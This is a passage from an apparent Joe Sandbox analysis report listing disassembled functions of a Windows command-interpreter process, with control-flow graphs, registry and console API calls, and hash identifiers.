                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4091E7B17007009BFB14ABA4ED5AAEF37B9EF45701B048119F606DB1A2DF7899C1CB16
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00018273 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 309registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 207 18273-182b7 call 27f80 210 182bd-182db RegOpenKeyExW 207->210 211 182e1-1831b RegQueryValueExW 210->211 212 18540-1854c 210->212 213 18321-18355 RegQueryValueExW 211->213 214 2b0f1-2b0f8 211->214 212->210 215 18552-18571 time srand call 26b30 212->215 216 18371-183a5 RegQueryValueExW 213->216 217 18357-1835e 213->217 219 2b0fa-2b108 214->219 220 2b10d-2b114 214->220 224 2b165-2b16c 216->224 225 183ab-183df RegQueryValueExW 216->225 222 18364-1836a 217->222 223 2b139-2b140 217->223 219->213 220->213 221 2b11a-2b134 _wtol 220->221 221->213 222->216 223->216 227 2b146-2b160 _wtol 223->227 228 2b181-2b188 224->228 229 2b16e-2b17c 224->229 230 183e1-183e8 225->230 231 183fb-1842f RegQueryValueExW 225->231 227->216 228->225 232 2b18e-2b1a8 _wtol 228->232 229->225 233 2b1ad-2b1b4 230->233 234 183ee-183f5 230->234 235 18431-18438 231->235 236 1846c-184a0 RegQueryValueExW 231->236 232->225 233->231 239 2b1ba-2b1cb wcstol 233->239 234->231 240 2b1d3-2b1da 235->240 241 1843e-1844e 235->241 237 184a6-184ad 236->237 238 2b24c-2b254 236->238 242 184b3-184c3 237->242 243 2b20f-2b216 237->243 253 2b25a-2b25d 238->253 239->240 244 2b1f5 240->244 245 2b1dc-2b1ed wcstol 240->245 246 2b200-2b202 241->246 247 18454-1845d 241->247 249 184c9-184d2 242->249 250 2b23c-2b23e 242->250 251 2b231 243->251 252 2b218-2b229 wcstol 243->252 244->246 245->244 248 2b203-2b20a 246->248 247->248 254 18463-18466 247->254 248->236 255 184d8-184db 249->255 256 2b23f-2b241 249->256 250->256 251->250 252->251 257 2b263-2b269 253->257 258 184f4 253->258 254->236 254->248 255->256 259 184e1-184eb 255->259 256->238 260 184fa-1852e RegQueryValueExW 257->260 258->260 261 2b26e-2b271 258->261 259->253 262 184f1 259->262 263 2b283-2b28a 260->263 264 18534-1853a RegCloseKey 260->264 261->260 265 2b277-2b27e 261->265 262->258 266 2b2d9-2b2e1 263->266 267 2b28c-2b2b5 ExpandEnvironmentStringsW 263->267 264->212 265->260 266->264 270 2b2e7-2b2f4 call 1acb0 266->270 268 2b2b7-2b2c8 call 1f3a0 267->268 269 2b2ca-2b2cc 267->269 272 2b2d3 268->272 269->272 270->264 272->266
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 000182D3
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00018313
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0001834D
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0001839D
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 000183D7
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00018427
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00018498
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00018526
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0001853A
                                                                                                                                                                                                                                                                                                                                                                                                                          • time.MSVCRT(00000000), ref: 00018554
                                                                                                                                                                                                                                                                                                                                                                                                                          • srand.MSVCRT ref: 0001855B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 145004033-3846321370
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c2c5a83a475b64523d7abd91d59f18e190d038f2e3920c29e03be0ec43b7dd2c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cc1eed242024161e0a4b59c6b80abf99506be2bb0339af34abac5d59eb743eca
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2c5a83a475b64523d7abd91d59f18e190d038f2e3920c29e03be0ec43b7dd2c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3C1A5359002A9EAEF328B50DD05BDA77B8FB19702F1081D6E689E2190DBB45FC8CF55
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000209B1 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 276 209b1-20a12 GetCurrentThreadId OpenThread call 1e2af HeapSetInformation RegOpenKeyExW 279 2e9c5-2e9ea RegQueryValueExW RegCloseKey 276->279 280 20a18-20a50 call 21f5b call 21f1a call 187ca 276->280 283 2e9f5-2ea03 call 163bd call 34840 279->283 290 20a55-20a59 280->290 291 2ea08-2ea10 call 21e70 283->291 290->283 292 20a5f-20a66 290->292 301 2ea12 291->301 294 2ea58-2ea6d _setjmp3 292->294 295 20a6c-20a81 _setjmp3 292->295 297 2ea82-2ea85 294->297 298 2ea6f-2ea71 294->298 299 20a87 295->299 300 2ea1c-2ea24 295->300 305 2ea87-2ea95 call 163bd call 34840 297->305 306 2eaaa-2eab3 call 1dd98 297->306 298->297 302 2ea73-2ea7b call 21e70 298->302 303 20a8a-20a8c 299->303 300->303 304 2ea2a-2ea2d 300->304 301->300 322 2ea7d 302->322 310 20ac5-20ac7 303->310 311 20a8e 303->311 304->303 325 2ea9a-2eaa2 call 21e70 305->325 320 2eac6-2eac7 call 262c0 306->320 321 2eab5-2eac5 _setmode 306->321 313 2ea52 310->313 314 20acd-20ad5 call 21e70 310->314 317 20a90-20a96 311->317 313->294 333 20ad7 314->333 323 20ae0-20af1 call 1c570 317->323 324 20a98-20a9c 317->324 335 2eacc-2eaff EnterCriticalSection LeaveCriticalSection call 1c570 320->335 321->320 329 2eb7f 322->329 339 2ea41-2ea49 call 21e70 323->339 340 20af7-20afa 323->340 324->317 330 20a9e-20aba call 1e310 GetConsoleOutputCP GetCPInfo call 1e2af 324->330 345 2eaa4 325->345 350 20abf 330->350 338 20ada exit 333->338 349 2eb01-2eb04 335->349 338->323 357 2ea4b-2ea4d 339->357 346 2ea32-2ea3a call 21e70 340->346 347 20b00-20b04 call 1e470 340->347 345->306 359 2ea3c 346->359 353 20b09-20b0b 347->353 355 2eb06-2eb70 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo call 1e2af call 1e470 call 1e310 GetConsoleOutputCP GetCPInfo call 1e2af 349->355 356 2eb75-2eb7d call 21e70 349->356 350->310 353->324 358 20b0d-20b10 353->358 355->335 356->329 357->338 358->324 359->329
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000209CB
                                                                                                                                                                                                                                                                                                                                                                                                                          • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 000209D8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E2AF: SetThreadUILanguage.KERNELBASE ref: 0001E2C6
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 000209ED
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00020A0A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 00020A72
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE ref: 00020AA3
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 00020AB4
                                                                                                                                                                                                                                                                                                                                                                                                                          • exit.KERNELBASE ref: 00020ADA
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 0002E9E1
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 0002E9EA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,0002EF7C,?,00000000,00000000), ref: 00021FB2
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,0002EF7C,?,00000000,00000000), ref: 00021FCE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F1A: GetConsoleOutputCP.KERNELBASE(00020A41), ref: 00021F1A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 00021F2B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021F1A: memset.MSVCRT ref: 00021F45
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0004CA04), ref: 000187EE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000187FA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0001880E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00037460,00000001), ref: 0001881B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: _get_osfhandle.MSVCRT ref: 00018828
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: GetConsoleMode.KERNELBASE(00000000), ref: 00018830
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: _get_osfhandle.MSVCRT ref: 0001883C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: GetConsoleMode.KERNELBASE(00000000), ref: 00018844
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0001886A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000187CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000188A5
                                                                                                                                                                                                                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 0002EA5E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          • DisableCMD, xrefs: 0002E9D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Software\Policies\Microsoft\Windows\System, xrefs: 00020A00
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4238206819-1920437939
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d207094e063f79fd96a8bf5b37bef9045d9940c03cb365e4a1efc98b2373e7ff
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bb4e9eb99e0f4f467d380d6d9f3cf99a746b8c48ffad30027a69185e8d0f992f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d207094e063f79fd96a8bf5b37bef9045d9940c03cb365e4a1efc98b2373e7ff
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0671E7B1A40355AEFB51AB74FC469EF77ACEF06345F140529F502E21A3EB39D8408B26
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000200E9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 370 200e9-20140 memset call 1e3f0 373 20146-2014b 370->373 374 2e615-2e61d call 21e70 370->374 376 20151-2016a GetModuleFileNameW call 1ec2e 373->376 377 2e627 373->377 380 2e61f-2e621 exit 374->380 381 2e632-2e63e call 1a976 376->381 384 20170-2017e call 1ec2e 376->384 377->381 380->377 388 2e643-2e64f call 1a976 381->388 384->388 389 20184-20192 call 1ec2e 384->389 394 2e654-2e660 call 1a976 388->394 389->394 395 20198-201a4 call 1ec2e 389->395 400 2e665-2e66a 394->400 395->400 401 201aa-201b6 call 1ec2e 395->401 402 2e672-2e67c call 1a62f 400->402 403 2e66c 400->403 408 2e714-2e724 _wcsicmp 401->408 409 201bc-201c4 401->409 410 2e6f8-2e6fd 402->410 411 2e67e-2e691 _wcsupr 402->411 403->402 408->409 414 2e72a-2e734 408->414 412 201c6-201d8 call 18bc7 409->412 413 201ee-201f3 409->413 417 2e705-2e70f call 1a976 410->417 418 2e6ff 410->418 415 2e693 411->415 416 2e699 411->416 424 201e2-201ed call 26b30 412->424 425 201da-201e1 ??_V@YAXPAX@Z 412->425 413->412 414->409 415->416 420 2e69c-2e6a5 416->420 417->408 418->417 420->420 423 2e6a7-2e6b0 420->423 427 2e6b2-2e6b8 423->427 428 2e6ba-2e6ce call 201f5 423->428 425->424 427->428 433 2e6d0-2e6d2 428->433 434 2e6e1-2e6e3 428->434 435 2e6d4 433->435 436 2e6da-2e6df 433->436 437 2e6e5 434->437 438 2e6eb 434->438 435->436 439 2e6f0-2e6f3 call 1fc40 436->439 437->438 438->439 439->410
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002011A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00020156
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0003E590,00002000,?,00058BF0,00000000,?,?,00018F0D), ref: 0001EC51
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001EC77
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001EC8D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECB9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECCF
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECE5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECF7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ED0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 000201DB
                                                                                                                                                                                                                                                                                                                                                                                                                          • exit.MSVCRT ref: 0002E621
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0002E683
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0002E71A
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2336066422-4197029667
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 14e1db6da90e5237db5dab1c810d39c45d7bc95ab9cc1b92db699c7078146f32
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e19d8be47be618caace5b0c7f7879ad7d582539014ae6a18f4cbf2ca1ad93c30
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14e1db6da90e5237db5dab1c810d39c45d7bc95ab9cc1b92db699c7078146f32
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251E730B403668BDF649B60EC996FE73A59F60344F044569E906A7182EF349E818B91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00018BC7 Relevance: 24.3, APIs: 16, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 441 18bc7-18be4 call 27d90 444 2b5d4-2b5d8 441->444 445 18bea-18c16 call 25a2e call 1e3f0 441->445 444->445 447 2b5de-2b5e3 444->447 452 2b774-2b77a call 261e6 445->452 453 18c1c-18c2d call 1acb0 445->453 449 18e67-18e76 447->449 456 2b77f 452->456 453->452 459 18c33-18c3a 453->459 458 2b781 456->458 460 18c3d-18c46 459->460 460->460 461 18c48-18c4c 460->461 462 18c4f-18c59 461->462 463 18c66-18c70 462->463 464 18c5b-18c60 462->464 466 2b5f0 463->466 467 18c76-18c85 GetCurrentDirectoryW 463->467 464->463 465 2b5e8-2b5eb 464->465 465->462 468 2b5fb 466->468 467->468 469 18c8b-18cb0 towupper iswalpha 467->469 470 2b606 468->470 469->470 471 18cb6-18cba 469->471 474 2b60f 470->474 471->470 472 18cc0-18cde towupper 471->472 473 18ce4-18cf8 GetFullPathNameW 472->473 472->474 475 2b61a-2b622 GetLastError 473->475 476 18cfe-18d01 473->476 474->475 479 2b627-2b647 call 261e6 _local_unwind4 475->479 477 18d07-18d0e 476->477 478 2b64c-2b66a call 261e6 _local_unwind4 476->478 482 18d14-18d19 477->482 483 2b674 477->483 478->483 486 2b747-2b767 call 261e6 _local_unwind4 482->486 487 18d1f-18d23 482->487 490 2b67f 483->490 486->458 489 18d29-18d2d 487->489 487->490 489->486 492 18d33-18d37 489->492 493 2b68a 490->493 492->493 494 18d3d 492->494 497 2b695 493->497 495 18d40-18d4a 494->495 495->495 496 18d4c-18d52 495->496 496->497 498 18d58 496->498 500 2b6a0 497->500 499 18d5b-18d73 call 27d82 498->499 504 18d82-18d8c 499->504 505 18d75-18d7c 499->505 502 2b6ab-2b6b6 GetLastError 500->502 506 18da2-18da9 502->506 507 2b6bc-2b6bf 502->507 504->500 509 18d92-18d9c GetFileAttributesW 504->509 505->504 508 18e77-18e7a 505->508 511 18dc9-18dd2 506->511 512 18dab-18db0 506->512 507->506 510 2b6c5-2b6c8 507->510 508->499 509->502 509->506 510->479 513 2b6ce 510->513 516 18dd4-18dd9 511->516 517 18dfa-18dfc 511->517 514 2b6d3 512->514 515 18db6-18dbc call 20207 512->515 513->506 519 2b6de 514->519 525 18dc1-18dc3 515->525 516->519 520 18ddf-18de9 GetFileAttributesW 516->520 521 18e09-18e0e 517->521 522 18dfe-18e01 517->522 526 2b6e9-2b6f4 GetLastError 519->526 520->526 527 18def-18df4 520->527 523 18e10-18e19 SetCurrentDirectoryW 521->523 524 18e87-18e8d 521->524 528 18e03-18e07 522->528 529 18e1f-18e24 522->529 523->475 523->529 524->523 525->478 525->511 526->479 532 2b6fa 526->532 527->517 533 2b6ff-2b722 call 261e6 _local_unwind4 527->533 528->521 528->529 530 18e26-18e30 call 1a976 529->530 531 18e8f-18e95 529->531 539 2b727-2b745 call 261e6 _local_unwind4 530->539 540 18e36-18e3e 530->540 531->530 532->479 533->449 539->456 541 18e40-18e65 call 18e9e call 18e7f call 261e6 540->541 542 18e97-18e9c 540->542 541->449 542->541
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00025A2E: memset.MSVCRT ref: 00025A5A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000,?,00000104,?), ref: 00018C7A
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00018C8F
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswalpha.MSVCRT ref: 00018CA4
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00018CC4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00018CF0
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 00018D93
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 00018DE0
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00018E11
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0002B6AB
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1133067188-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e569a5c747a614bc6a6a248f90b3e1e6f462bce89e2383c2c5568f44f1eaa8d3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b11615e399b053b1afab0e95f280b64fe2480d3ceae8c295213d1dbd4b818b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e569a5c747a614bc6a6a248f90b3e1e6f462bce89e2383c2c5568f44f1eaa8d3
